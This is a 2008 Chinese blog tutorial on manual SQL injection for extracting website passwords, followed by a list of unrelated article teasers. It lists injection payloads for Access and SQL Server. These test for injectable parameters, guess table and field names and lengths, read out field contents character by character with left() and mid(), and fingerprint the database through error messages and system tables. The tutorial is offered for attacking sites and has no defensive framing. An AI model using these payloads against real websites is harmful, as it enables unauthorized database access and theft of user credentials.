手工SQL注入猜解网站密码
作者:biyuan 来源:biyuan的专栏 发布时间:2008-07-26 12:16:00
判断是否存在SQL注入点
以下为程序代码:
'
and 1=1
and 1=2
' and char(124)%2Buser%2Bchar(124)=0 and '='
and char(124)%2Buser%2Bchar(124)=0
错误判断
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'ID=49' 中。
/showdetail.asp,行8
从这个错误提示我们能看出下面几点:
1. 网站使用的是Access数据库,通过JET引擎连接数据库,而不是通过ODBC。
2. 程序没有判断客户端提交的数据是否符合程序要求。
3. 该SQL语句所查询的表中有一名为ID的字段。
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'sonybb' 转换为数据类型为 int 的列时发生语法错误。
/lawjia/show.asp, 第 47 行
但是别有用心的人从这个出错信息中,可以获得以下信息:
该站使用MS_SQL数据库,用ODBC连接,连接帐号名为:sonybb。
SQL数据库表名称猜解
以下为程序代码:
and exists (select * from 表名称)
and 0<>(select count(*) from 表名称)
猜解表里面数据数量
以下为程序代码:
and 数据数量=(select count(*) from 表名称)
猜测表里面的字段名称
以下为程序代码:
and 1=(select count(*) from [表名称] where len(字段名)>0)
and exists (select 字段名 from 表名称)
猜测字段长度
以下为程序代码:
and 1=(select count(*) from [表名称] where len(字段名)<长度)
字段内容猜测
left函数猜测:
以下为程序代码:
and 1=(select count(*) from [表名称] where left(字段名,位数)='所在位数以内的内容')
mid函数猜测:
以下为程序代码:
and 1=(select count(*) from [表名称] where mid(字段名,查询的位数,1)='查询所在位数的数据')
精髓技巧:
以下为程序代码:
;and user>0
是sa登录,提示是将"dbo"转换成int的列发生错误,而不是"sa"。
数据库类型判断:
以下为程序代码:
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0
Access和 SQLServer都有自己的系统表,
比如存放数据库中所有对象的表,
Access是在系统表[msysobjects]中,
但在Web环境下读该表会提示"没有权限",
SQLServer是在表[sysobjects]中,在Web环境下可正常读取。
一般使用第一个判断
如果数据库是SQLServer,
那么第一个网址的页面与原页面是大致相同的;
而第二个网址,由于找不到表msysobjects,会提示出错,
就算程序有容错处理,页面也与原页面完全不同。
如果数据库用的是Access,那么情况就有所不同,
第一个网址的页面与原页面完全不同;
第二个网址,则视乎数据库设置是否允许读该系统表,
一般来说是不允许的,所以与原网址也是完全不同。
大多数情况下,用第一个网址就可以得知系统所用的数据库类型,
第二个网址只作为开启IIS错误提示时的验证。
猜你喜欢
- 第一,策划网站赢利。做网站是为了赢利,为了能赚大钱。所以,在做网站之前,首先要想好网站的赢利模式。且,赢利活动,市场活动,在网站还没做好之前
- 问题一:双核的优势在哪里?主要的应用领域有哪些?彭震:由于双核处理器在性价比、功效和可扩展性方面具有极大的优势,双核处理器可以在不改变基础设
- 从2009年到2011年,接触Dedecms已经有2个年头了,在这期间使用DEDE制作了有10来个网站,有些网站也取得不错的搜索排名和流量,
- 这个问题困扰了我一整天,都没有搞定,到处寻找解决方法。逛遍DEDE官方论坛与DZ官方论坛均没有一个祥细的步骤。其实发现,也蛮简单,所以发出来
- 聚友已经总结了五种Service Unavailable的原因,第一篇是常见的4个方面的原因(原文见http://www.juyo.org/
- 很多的站长,联系到老谢,近一半是些产品网站,也就是购物网站,说白了,就是网店推广。在淘宝等媒体上开店,只不过是借助淘宝网站的一个平台的依靠。
- 作者:Google 广告管理系统小组 李小轲 高效使用网站广告闲置资源通过第一章的介绍,大家已经了解如何使用 Goo
- 一、操作系统配置 1.安装操作系统(NTFS分区)后,装杀毒软件,我选用的是卡巴。2.安装系统补丁。扫描漏洞全面杀毒 3.删除Windows
- Foxmail Server(FMS)是一款功能强大的邮件服务器软件,他提供了多种邮件服务,包括SMTP、POP3、LDAP等,并内建邮件扩
- 昨晚,瑞典的顶级域名系统在例行维护时发生严重问题,导致启动失败,随后引发所有的DNS查询失败,整个瑞典互联网因此而停止。这次乌龙事件发生在当
- 新浪科技讯 北京时间5月12日早间消息,据国外媒体报道,本周,微软Windows Phone 7操作系统“准正式版”(RC1 Escrow)
- 通过论坛、留言板和讨论组来将你的AdSense收入最大化!在第8章,我们讨论了如何通过博客来创造收入,不过博客当然不是互联网上唯一的内容,也
- 因为手动发文章比较多,添加tag标签的时候老是要切换输入法,非常麻烦,在网上找了下,看到的几乎都是同一个人发的文章被转载的,代码其实是错误的
- 本系列写到今天(1,2),我打算做个完整的系列,从公司基本上能用得上的东西都写一写,在2008R2上有什么改变,能为大家带来何种易用性以及管
- 核心提示:综述P2P流量识别端口识别法、应用层特征识别法、流量模式识别法以及连接模式识别,概述P2P流量识别技术,并对发展进行展望&
- FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX操作系统下使用FTP,都会遇到大量的FTP内部命令。 熟悉并
- 北京时间11月11日早间消息 我们将用八篇连续的报道,来深入剖析北电——这家加拿大历史上曾经最有价值
- Godaddy主机用户如果上传文件到网站的话,需要一个FTP客户端。FTP代表File Transfer Protocol (文件传输协议)
- 友情在网络中是一种信任,一种责任,也是一种品德,友情链接就是充满着善意友好的相互合作,在网络中大家更多的讲的应该是共赢,因而友情链接对于网站
- 这是一个吸引人的话题,同时也是最难解决的问题,尤其是在目前这个比较浮躁的大环境下,大量的采集,不停的Site,不断的被K,又大量的采集...